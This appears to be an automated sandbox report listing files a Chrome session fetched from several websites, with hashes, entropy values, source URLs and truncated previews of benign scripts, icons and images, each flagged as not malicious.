            SHA-256:AEC3D419D50F05781A96F223E18289AEB52598B5DB39BE82A7B71DC67D6A7947
            SHA-512:8EEEAEFB86CF5F9D09426814F7B60E1805E644CAC3F5AB382C4D393DD0B7AB272C1909A31A57E6D38D5ACF207555F097A64A6DD62F60A97093E97BB184126D2A
            Malicious:false
            Reputation:low
            Preview:/*! jQuery v1.11.3 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.3",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):1257
            Entropy (8bit):4.845241911960573
            Encrypted:false
            SSDEEP:24:2d1bqE1L6/6gxTVafAdeaxM2LiUaNgGXo0NAPJIho0NAfNIho0NAk3Ig:cVqEV6SNPUsgo
            MD5:B964C0CA91B34049D7A880BEDEF08351
            SHA1:CBCC614ED18814D304320C57AC2A714623FF5543
            SHA-256:427365A3789A7E14C09B866482793263E4512643FD351E5B46635C9C81C04688
            SHA-512:4C00C688D45337EA1EC52F64917B777028DC7BE34B648E24616F53A44BF1B24ADCB1A68A28B5C1D7DC5AE7EA18748DA7C9AC6EE7E59A99860719AB9D1C69E4D0
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="3px" height="11px" viewBox="0 0 3 11" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Icon/more</title>. <defs>. <filter color-interpolation-filters="auto" id="filter-1">. <feColorMatrix in="SourceGraphic" type="matrix" values="0 0 0 0 0.435547 0 0 0 0 0.435547 0 0 0 0 0.435547 0 0 0 1.000000 0"></feColorMatrix>. </filter>. </defs>. <g id="Symbols" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Header" transform="translate(-1312.000000, -13.000000)">. <g id="more" transform="translate(1312.000000, 13.000000)" filter="url(#filter-1)">. <g>. <ellipse id="Oval" fill="#000000" fill-rule="nonzero" cx="1.04166667" cy="1.26527565" rx="1.04166667" ry="1.26527565"></ellipse>. <ellipse id="Oval" fill="#000000" fill-rule="nonzero" cx="1.04166667" cy="5.12295191" r
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 900 x 482, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):37211
            Entropy (8bit):7.954245548607627
            Encrypted:false
            SSDEEP:768:hfhyU2sDDghq02jKM7H+hMb62XMmklDSuZX98O07ZLRmO+:d7ghl2jKM7b2ghk5COEmO+
            MD5:578604820692480DD8A6DAF62097CFEC
            SHA1:6546DC134A796A92CD02A36D7430E1F7F9165DB0
            SHA-256:0C652DC2D20990C76084E1B04649754BC3EF08BA102731E0B952C5F53EB2495B
            SHA-512:7BFBF57BF0D00B8B5ADE5E97B23446F585B9B2E2149463B3DF51FB7EE525B29DE8AC4B696953F7EFFDC0EFA31018D3CC3E5B7DD0E89705107717B742B7D15A53
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/design-thinking-home.png
            Preview:.PNG........IHDR..............|.U....tEXtSoftware.Adobe ImageReadyq.e<....IDATx....|.e....I.." ^.....Z. (E`.X..O..<(.*...........RZ......*J.(.x@Q.]E@@h.4...$.......$..y=.I.d..I...<.R......................................................................................................................................................................................................@.i.....H.c._&.J.CJ...)..,.ZWPC .".....%.^R.....X.s6.?K).R*......~....@....2.|......?..S._........+....i..k..6m.,..|3$.~O.@.t..G.d...R.....R.KyVJqii.Rj...x0.6........`..#d.._^^.B...<VB..o...QG.errr.....{......CM.@.T..Cer........W......%.G...r......\...7.I...0..5k.{..............@@u..I..3.....J....Q....a.!.\...I.>..O.?../[{.l ...l...>R*....B7,\.0D......`....-....+...m.._.~....../._......,....q{O.:U.;WUWWG..aC..7.......y............1..._VV....`.H6....+U.............a.......t.M.$.E.;.c.a..o..>..?C..Z.a.1....I....~..r.x....G.r.Yg....[.9.R..R%..'.H..`w..NNN.O^.:)....\C
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (9217)
            Category:downloaded
            Size (bytes):231356
            Entropy (8bit):5.458115913562013
            Encrypted:false
            SSDEEP:3072:MfLeYq8At6Jc37OeR8NteGvQ+AMPpgArl0xYu5s713d+:MfLeYZ+6JEH8N7QQGArHu5s713M
            MD5:B7DBAB5C73AE17725BCE0368460F1366
            SHA1:84C6B0316DDC3CC17897FD95F18BA6059166113D
            SHA-256:979D977217C7032B1CD864C0B65CE5D4FF834AA9CA116198873299B5A60CFC9A
            SHA-512:570718F92E8DCB94F348C9162D5CA0619C1CC902D5336B3D702DEFC47AB12C0F4C722D471880F6DF2CA4BFF2539F1A2DC0B71B874CDF13D75A5D8C32F5283750
            Malicious:false
            Reputation:low
            URL:https://connect.facebook.net/en_US/fbevents.js
            Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):1536
            Entropy (8bit):5.219906144393995
            Encrypted:false
            SSDEEP:24:t4LRndFtxY6bgwHFUHc87OOJXLZckYWz6/5uKRxseAwHFUHc87OOJ48byF5lMihY:+RHgFPXLZcfWz6hWP4nFTS
            MD5:E5C5A06E062EF5D90996B78EA47F34E0
            SHA1:68D40AE874118DD4CFD57A78FA15281608211E3F
            SHA-256:80940BC522CF67814164D1BD2A3C642CE1783F4D80958D2E0CBEC812B01AAF3F
            SHA-512:2A07B2628FD195489EF82A43D8E6CC64734B4D614475B95AB47BD9B54A68FD0102567BCACFAE17916C70556C779A6EC6881A9A21E2BE74538F9E856EC21F73B3
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/66.svg
            Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0,0,256,256" width="23px" height="23px"><g fill="none" fill-rule="nonzero" stroke="#262028" stroke-width="32" stroke-linecap="butt" stroke-linejoin="miter" stroke-miterlimit="10" stroke-dasharray="" stroke-dashoffset="0" font-family="none" font-weight="none" font-size="none" text-anchor="none" style="mix-blend-mode: normal"><path d="M120.42141,236.26563c-55.60791,0 -100.68704,-45.07912 -100.68704,-100.68704v-15.15719c0,-55.60791 45.07912,-100.68704 100.68704,-100.68704h15.15719c55.60791,0 100.68704,45.07912 100.68704,100.68704v15.15719c0,55.60791 -45.07912,100.68704 -100.68704,100.68704z" id="shape"></path></g><g fill="none" fill-rule="none" stroke="none" stroke-width="1" stroke-linecap="butt" stroke-linejoin="miter" stroke-miterlimit="10" stroke-dasharray="" stroke-dashoffset="0" font-family="none" font-weight="none" font-size="none" text-anchor="none" style="mix-blend-mode: normal"><g transfor
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1000 x 795, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):558043
            Entropy (8bit):7.977517373391414
            Encrypted:false
            SSDEEP:12288:9Dj8IlPr21o26kpsXbpoKzupYTQR8FECli7ii5iIXxgqj1ZRO8ge1h:9DQIJrUo26kpCSDGT3EClUiiJgqjpO8P
            MD5:0021ADD0A8713492C3440917B8DF4328
            SHA1:86A6BA178D8054BDDA07A30665F11C13AA9E107C
            SHA-256:615B1D268C974963076765EB7A20BDB8619F2EB321F0C62D941FF05F57BBDB17
            SHA-512:1C86410D816C1E1E7C6A5D0BA8F026AD9D2B149897A6D4FB5E8B19F8737EF6BC97EE2C8D6C46AA0027D2BEEBE11705AEFF722D2F99E30675E0446132EFC83B7A
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/port7-m.png
            Preview:.PNG........IHDR...............S....pHYs.................sRGB.........gAMA......a....pIDATx....b.I....x.}..w...[L....O.R.fg.+.K..p..`.O..........'...._.......z..}O...|...g..Cp....._....G.z..K$..z....y..|..U.P_.m..c-y...y.G?u..l...E.Rl...-\..^.%..A.h]L.2........o..bO....p.6....!..0(...V....CAz.^b..5..y_.We...hc.u..#$3...{.t...m...........G.{...?..#.o.0.p~^k.....&..b.5h..?..%+..yd..S..{X..Q..}r.o../s...2".o.9p<...y/h....>.lT.@....;.....).6.._..h.....9..!P>.....#...w<).........A..M..|Z...:.f.....z......J(l..&2N%.S..X.?.a.....a..0..A.....!aqz....?.......G..{]<AU.M......?..12._m2."A.Nx............+V~..0.76..~....X.....M,...C..X..H.>'....%.qBM.sXIa..:.ci..X4.k..i.'.`.E,..W.......r..../CY.8r._..QREs....y.'._.d...q.?...=.\.E...s.......'(..q..'.id.`..F..u.q.p.b5,LocJ....q:MX.K.y.4.v.X}}..;..zm2....-..D.......Mrp....^..D.y....hL.n.o.......W.oQp.......<.G.....a.(..!.....<,7.I..0t............?..*R.\..~..I...o...R..#V..R.......iEg...U.Y..?$..U..t.....p....F|T7
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Algol 68 source, ASCII text, with CRLF line terminators
            Category:downloaded
            Size (bytes):1199
            Entropy (8bit):4.911975161717894
            Encrypted:false
            SSDEEP:24:VEy/CcqsC4jJbCn3F25pjaUpJD9KvFy/CRRVrc1+4h3SafdM3GYa:VbK/sC0W3UpmUpKvM/CBrc1+4h39dua
            MD5:F7B821C11D5CC4F69400F426D3344289
            SHA1:7A396CC453A17CB30492A3BBD5A92D8598CA160F
            SHA-256:9E78C24746666AD21A5735AB4166085CC35C6FCDB1FB8D6130358099E091804E
            SHA-512:904138C32002AD55A54B66ABE93C9817C5544BA935F389BC198CD478971BD63B7D0ADDF6CC835BCB5810FF37DE961AD20FD00E5887C4830A2DEFACB530FBEA8E
            Malicious:false
            Reputation:low
            URL:https://uzer.co/js/forms.js
            Preview:/*-------------Label for phone-------------*/..const input = document.querySelector("#phone");..window.intlTelInput(input, {.. initialCountry: "co",.. onlyCountries: ['us', 'gb', 'ca', 'co', 'mx', 'br', 'es', 'de', 'fr', 'it', 'nl', 'ch', 'pe', 'ec', 'ar', 'py', 'uy', 've'],.. preferredCountries: ['co', 'us'],.. utilsScript: "https://cdn.jsdelivr.net/npm/intl-tel-input@20.0.5/build/js/utils.js",.. customPlaceholder: function (.. selectedCountryPlaceholder,.. selectedCountryData.. ) {.. return "e.g. " + selectedCountryPlaceholder;.. },..});....var iti = window.intlTelInputGlobals.getInstance(input);....input.addEventListener('input', function () {.. var countryName = iti.getSelectedCountryData().name;.. document.getElementById('country').value = countryName;..});....$(document).ready(function () {.. $('#phone').on('input', function () {.. if ($(this).val().trim() !== '') {.. $('.label-phone').addClass('active');..
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with CRLF line terminators
            Category:downloaded
            Size (bytes):7040
            Entropy (8bit):4.655495934515554
            Encrypted:false
            SSDEEP:96:+WZzPw+ir3ethaSTPi+/9RCG4XpPRhh9l6+k9lhBWH0rABWH0r9RFPfv:7zPw+FPVRihPUFWH7WHIXH
            MD5:7F91180E4C55C5289F0EDE29001B77CE
            SHA1:C49EC39D5FC31772836583A2AC5B00422A337D5A
            SHA-256:D98FFF5BD37731607459934B129FCF5A9EED2960AFDC10879B5586584BF5361E
            SHA-512:C8C3B0E42D9CD04BC6C6E48F160D94F08198E5468289EAB1B3A702AF0D3E710CDC33C9B6AAD1F5BC4DAA4B4582603BEC501326F64EA95DE0060194553EB7A2AE
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/js/main-01.js
            Preview:jQuery(document).ready(function($) {....//-------------------------- STICKY MENU......var stickyOffset = $('.main-menu').offset().top;..$(window).scroll(function(){.. var sticky = $('.main-menu'),.. scroll = $(window).scrollTop();.... if (scroll >= stickyOffset) sticky.addClass('fixed');.. else sticky.removeClass('fixed');..});....//-------------------------- FUNCIONES RESPONSIVE...... var alterClass = function() {.. var ww = document.body.clientWidth;.. if (ww < 950) {.. $('.menu-container').addClass('offcanvas offcanvas-start').attr("visibility", "visible");.. $('.submenu-collapse').removeClass('show');.. $('.first-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.. $('.second-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.... } else if (ww >= 951) {.. $('.menu-container').removeClass('offcanvas offcanvas-start').attr("visibility", "hidden");.. $('.submenu-collapse').addClass('show');.. $('.first-lvl'
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):1101
            Entropy (8bit):4.851720620025946
            Encrypted:false
            SSDEEP:12:TMHd4lniOaYxJNTb/lR2kvJ/D4n3rTMwMlLSA3A37bLVYyV+qwuqpJFIFMoW5mqL:2dUnjTxJNJRwTMwtF+3ueua5mq928DY2
            MD5:B986C13F9976E2CE0FCBB3C0F54DBA5B
            SHA1:E95575D872662C3A2C9474A4CCDABA59F27CD755
            SHA-256:9D6418C154873B4D8B682F6ED4E6CE94EED2099C9DE5CB8F2949C86518ADD60A
            SHA-512:CB32283BADCAA508771186C8946A407FE27EC1DE762CEB5A992C813158D01FE50D8CAD3543D39450535559F9263FE038D9E38864B531ED7855A5102C78553D04
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="linkedin">.. <path d="M11.5 0C17.8516 0 23 5.14912 23 11.5C23 17.851 17.8516 23 11.5 23C5.14833 23 0 17.8509 0 11.5C0 5.1492 5.14841 0 11.5 0Z" id="Path" fill="#0E76A8" fill-rule="evenodd" stroke="none" />.. <path d="M0.0115269 10.051L2.16492 10.051L2.16492 2.87351L0.0115269 2.87351L0.0115269 10.051ZM8.40081 2.62489C7.35573 2.62489 6.42063 3.00654 5.75728 3.84895L5.75728 2.8499L3.59599 2.8499L3.59599 10.051L5.75728 10.051L5.75728 6.15686C5.75728 5.33387 6.51127 4.53101 7.45568 4.53101C8.4001 4.53101 8.633 5.33387 8.633 6.13672L8.633 10.0503L10.7864 10.0503L10.7864 5.97645C10.7863 3.14668 9.4466 2.62489 8.40081 2.62489ZM1.07816 2.15624C1.67329 2.15624 2.15632 1.67321 2.15632 1.07808C2.15632 0.482945 1.67329 0 1.07816 0C0.483024 0 0 0.483024 0 1.07816C0 1.67329 0.483024 2.15624 1.07816 2.15
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (4763), with no line terminators
            Category:dropped
            Size (bytes):4763
            Entropy (8bit):5.821164401638335
            Encrypted:false
            SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUupl2ENp:1DY0hf1bT47OIqWb1/plzNp
            MD5:FF94DDACD2A194AA3086DCE84C20F0C7
            SHA1:E4EBBC8A388BFF6840A34E2110C2334A6235AA1A
            SHA-256:05C1CCA46F5E1962B41A9E64152ADEFDB8F1CE72EE783BB3B26C58EE66242FB3
            SHA-512:64274143481B97C89A0D064F164DFA5039122D84F3339BEE941EC8659746E870A1FAF28F465ED23F849CD8832DD35DD0895347201AADFBD71217F0DDB7FF0CC9
            Malicious:false
            Reputation:low
            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):1956
            Entropy (8bit):4.55883124757184
            Encrypted:false
            SSDEEP:24:2d3fZA/57xJKj/j65MwO1w3mdnDZXfb7E2UvraVGVnCgjReRM44ITZC7J5530Jbp:c3hG57Y7nDpjrUWcT3b0ZSA2oVN
            MD5:719224E6281EFBCB1B8AAD184B82D7BB
            SHA1:AD8D49990AE14BFF5DB5734AAD0D4E40055193D7
            SHA-256:25EF7C0B6DF3B3E466D647008449F20F5727AB19EDBDD4E76B94E9FB98A7A6C7
            SHA-512:A8E8F72847957F12186D3A99022D3968F635A14634D09CE117C2F640C37D48D69AB29183FDCE27053FFA4FD7D526204C0CF53ADD3394CDD6FA7A0CD3744BD6B9
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/63.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="39px" height="39px" viewBox="0 0 39 39" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="Group-25">.. <path d="M0 0L39 0L39 39L0 39L0 0Z" id="Rectangle" fill="#FFFFFF" fill-opacity="0" fill-rule="evenodd" stroke="none" />.. <g id="Group-3" transform="translate(4 6)">.. <path d="M4.27641 12.857C2.64105 12.857 1.31061 14.1979 1.31061 15.8462L1.31061 19.2449C1.31061 20.8932 2.64105 22.2341 4.27641 22.2341L7.49799 22.2341L7.49799 12.857L4.27641 12.857ZM23.5021 22.2341L26.7237 22.2341C28.3591 22.2341 29.6895 20.8932 29.6895 19.2449L29.6895 15.8462C29.6895 14.1979 28.3591 12.857 26.7237 12.857L23.5021 12.857L23.5021 22.2341ZM7.5946 28C6.06392 28 4.81867 26.7449 4.81867 25.2022L4.81867 23.5551L4.27641 23.5551C1.91842 23.5551 0 21.6215 0 19.2449L0 15.8462C0 13.7669 1.47743 11.9873 3.5129 11.6147L3.83032 11.5566L3.84517 11.2318C3.98303 8.20612 5.25693 5.38059 7.43219 3.27576C9.61
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 220 x 53, 8-bit/color RGBA, non-interlaced
            Category:dropped
            Size (bytes):3628
            Entropy (8bit):7.926492743877884
            Encrypted:false
            SSDEEP:96:YoQJELCEBBBMnJyqomTBhq3RpqbUd9uV+W5rU/XJ6IdP:YvJEL+9oyDqeE0trU/J6IdP
            MD5:A05E6932B02F45B5BCE0F54A08FA3EE0
            SHA1:F12F08A8281EAA3A4227FF81BA38F525A212E387
            SHA-256:9AB3CBCC0979269618E4B7454D50AB8B3C9AFA6453423E08003FDFC10B0CCF25
            SHA-512:25C7D8112A6A50591C17178276A096CE30DAB2F72287112B0053B1F0C2813873A492050C70B2E861C2626E98335A0A16604132FB59CC36B12714661775BD7CF9
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR.......5.....*.......pHYs...%...%.IR$.....sRGB.........gAMA......a.....IDATx...o.....G..S....=e|.]9E.4.6.[o.o.E............ ._.-v..P`.E{..7.)...p.C...6..H3.8Qm~.B....E..G>rFD.....x<..X.859.T.r:.t.......)V.".BN.F....N..Z...@...d.......|}.Y.....D].o....................G...2.CNR}.:w.iW..Q...@.8T..@N.(.e.Z.|d..P..U.G..7.~q.GJ...e^[eBK..:.)..*.F}"...^...Ty&...^..W4)U..+J.A.T.\...X.xP..q.ep-.......3.}.J&.:g..r7.<md&...h...J..i.:.a..Q.U%.sO.8.S....{.i.*.R.$H..Y.......}v...8u(5..4..61.....y.o..=.z.auD......Q...Vsd<.j..........]..8.....Z...z8........$e...6.a...Q...2.u....4..RO..g.!O.+..[|7.&..so.R.[........U.C.1...)U.F.{.F..J...g....Z*.G._s..8.)k\0......R...m.s...~....W...J....rh....N....J=A..2.....P......u%..p......8T.{4.CU....7...0.......x.0...P4(g.Q.I.......9..nzxzh$MD..D...C4....'\.A#A}w.y..0D|K..LQz..Mu_.=.6d|E.....D.N ..%.j1.....x<.....x<.....x<.....x<.....x<..E.g...St:....Q|..!.;......j..)....C.{.T.0.i.oH4... ..s....^.3...[M..W
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.180365114215879
            Encrypted:false
            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
            Malicious:false
            Reputation:low
            Preview:{"code":1,"message":"Session ID unknown"}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 5 x 264, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):351
            Entropy (8bit):6.2735369275843675
            Encrypted:false
            SSDEEP:6:6v/lhP3j/oe38RqPViFClo5lSJLeWPlsruZghOAFqbp5J1yUen8o1q6b3yUrUINz:6v/7zoe38qPym2lSHPlquZAOAepxcni4
            MD5:371A9DDE4534BB9CE1A16398FEEC62FB
            SHA1:84ABCB3BF00C7D33803A9266EFAD6D14FC53CF5F
            SHA-256:D344FD614D382638E8299B5164E47F7387943AAF0F7A60E13C86A99EC050875C
            SHA-512:643651C25BE35D9A3D0FE4F725F05057698277F32297600F14C5301F91BB4156652587418584E567C67155D5F111A38D5A6CDD263811D1AABEE824483B6E699B
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/separador-dato1.png
            Preview:.PNG........IHDR...............>.....sRGB........DeXIfMM.*.......i........................................................Lf......IDATX....1.E.........(@.)....I..........8A|E..W.HQ................z....?.X.......r....J!...~..*...........fx...b.....g..J=#.s..&....eR..}3.k......Q...!...(........D..!3..$ 3..:.. 3...@...=..O...'n..^p....IEND.B`.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):1225
            Entropy (8bit):4.862395756957701
            Encrypted:false
            SSDEEP:24:2dZjixJTmNTFTD1K4kAEEmdsRwZ3Ufg/8/gaK/DyMwq:chiPmtFU/4wFkgTai1
            MD5:C3281971B0054C7553B794E2B9E6D4BF
            SHA1:D5E823311452D95A982E8812B9C0D741A7E54600
            SHA-256:7E545D71387B98C7C44E89FBC44C4DD8666A955A588C197125865125C758612F
            SHA-512:01D276C1385A0AF1D5AD47EFD944E939BA06F92482CB2ADAFAF37B47DEEFB5BF69EC5E9F575BB7312EB4C7A52D1B1270BB3B286DF9A602F3DC262A64AC3C4595
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="24px" height="23px" viewBox="0 0 24 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <desc>Created with Lunacy</desc>.. <g id="Iconos/linkedin-logo-2">.. <g id="Iconos/linkedin-logo">.. <g id="Iconos/linkedin-logo">.. <path d="M2.80397 0C1.10879 0 0 1.11976 0 2.59228C0 4.03271 1.07671 5.18645 2.7382 5.18645L2.7713 5.18645C4.49931 5.18645 5.57398 4.03293 5.57398 2.59228C5.54141 1.11976 4.49931 0 2.80397 0ZM23.1116 22.2405L23.1116 13.6356C23.1116 9.0262 20.6676 6.88133 17.4075 6.88138C14.776 6.88138 13.6004 8.33999 12.9421 9.36105L12.9421 7.23393L7.98736 7.23393C8.05409 8.64276 7.98736 22.2405 7.98736 22.2405L12.9426 22.2405L12.9426 13.8599C12.9426 13.4109 12.9762 12.9644 13.1069 12.6436C13.4653 11.7463 14.2798 10.8187 15.6486 10.8187C17.4416 10.8187 18.1581 12.1951 18.1581 14.212L18.1581 22.2405L23.1116 22.2405ZM12.9421 9.36105L12.9421 9.40954L12.9095 9.40954C12.919 9.3
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):2075
            Entropy (8bit):4.841220551602856
            Encrypted:false
            SSDEEP:48:cUjTtm/HPYay5Bb1qFWvgiwT7CWvQ8uOnwkB9qZVe:xHEvE5F1qiICWvQ8rZqLe
            MD5:E30057AED282B66FE4EB51017B20E1B1
            SHA1:C121EB49AF5954666B8DC2B505F4CA83C36D34A1
            SHA-256:F56965B808E2681B1CC8E53270AECA700084404A3A210C0FF9247392EA34B935
            SHA-512:E452B11E6E8A957BC5754F5F751DB9936CC23A23C7CE8DD8885F36CA832E2299D860F21C1E2685E1B69BB7A46B16BFCF5A7E5EF7010A41D91AC38FC24168E263
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <defs>.. <filter id="filter_1">.. <feColorMatrix in="SourceGraphic" type="matrix" values="0 0 0 0 1 0 0 0 0 1 0 0 0 0 1 0 0 0 1 0" />.. </filter>.. <path d="M11.5 23C17.8513 23 23 17.8513 23 11.5C23 5.14873 17.8513 0 11.5 0C5.14873 0 0 5.14873 0 11.5C0 17.8513 5.14873 23 11.5 23Z" id="path_1" />.. <clipPath id="mask_1">.. <use xlink:href="#path_1" />.. </clipPath>.. </defs>.. <g id="facebook-(1)">.. <path d="M11.5 23C17.8513 23 23 17.8513 23 11.5C23 5.14873 17.8513 0 11.5 0C5.14873 0 0 5.14873 0 11.5C0 17.8513 5.14873 23 11.5 23Z" id="Mask" fill="#1977F2" fill-rule="evenodd" stroke="none" />.. <g clip-path="url(#mask_1)">.. <g id="facebook-(1)" transform="translate(6.708313 5.75)" filter="url(#filter_1)">.. <path d="M2.38979 9.75582C2.33005 9.75582 1.01566
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (2091), with no line terminators
            Category:dropped
            Size (bytes):2091
            Entropy (8bit):5.3076292279705335
            Encrypted:false
            SSDEEP:48:XrkWXFGEwIVGuQUtrEvo6ST7dkVYtNhsf2pcWUQWUUJRURXJp5KpU6d:eIVdQUWtSlkVmsf6cWUQWUUXUni
            MD5:67B2F530F01F7969F86CCF8D63F2C16D
            SHA1:43EFF8A39780ADA1D783FE769C566F2C3288D720
            SHA-256:BC64DA9FA28C95897C942F8805E8B885EDEB77731459D1A9AEABF5D125D279E8
            SHA-512:75283A93E23ACAB3CB9D7C54245BDB473527B416D99E4FFE93F6683A6CAAEA58CA9D7E0D964690EC7CBB84DFF6F24584A50B352C5956521A552505AFBBC249F7
            Malicious:false
            Reputation:low
